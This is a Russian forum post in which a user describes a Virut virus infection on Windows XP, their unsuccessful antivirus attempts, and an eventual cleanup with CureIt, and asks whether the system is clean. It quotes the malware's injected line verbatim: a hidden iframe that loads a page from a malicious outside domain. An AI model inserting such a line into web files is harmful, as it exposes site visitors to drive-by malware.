В результате действия вируса во всех .html и .php файлах на диске C:, а также на других дисках в тех папках, которые открывались в Проводнике или TotalCommander, начинает перед тегом "</body>" в бесконечном цикле добавлятся следующая строчка:
<iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe>Проверка компьютера антивирусом AVP 7.0 с последним обновлением базы, а также программой SUPERAntiSpyware ни привели к желаемому результату - они нашли и уничтожили с десяток вирусов и троянов, однако этот выловить так и не смогли. После перезагрузки и повторной проверки антивирусами новых вирусов не найдено, однако этот продолжает работу
Для более детальной проверки был установлена ещё одна идентичная ОС (Windows XP SP3 SATA) на диск C: в папку Windows.0. Компьютер в этой версии ОС нормально запускается, вирус себя никак не проявляет, однако при попытке загрузится в старой ОС сразу же начинает действовать. Полные проверки всех дисков с включением детального эвристического анализа через новую ОС ничего не дают, вирус не находится. Замена всех изменённых файлов в папке Windows на оригинальные файлы из Windows.0, а также удаление всей информации из временных папок (в т.ч. Temporary intetnet files как в папке Windows, так и во всех профилях) - не помогает, при загрузке в старой ОС он откуда-то вылазить и вновь начинает гадить.
В конце-концов помог CureIt - выщемил 132 экземпляра вируса Virus.Win32.Virut.56, однако 100%-й уверенности нет, потому скачал все рекомендуемые программы и провёл анализы, которые прикреплены ниже. Может кто точно сказать, вывел я эту гадость окончательно или нет?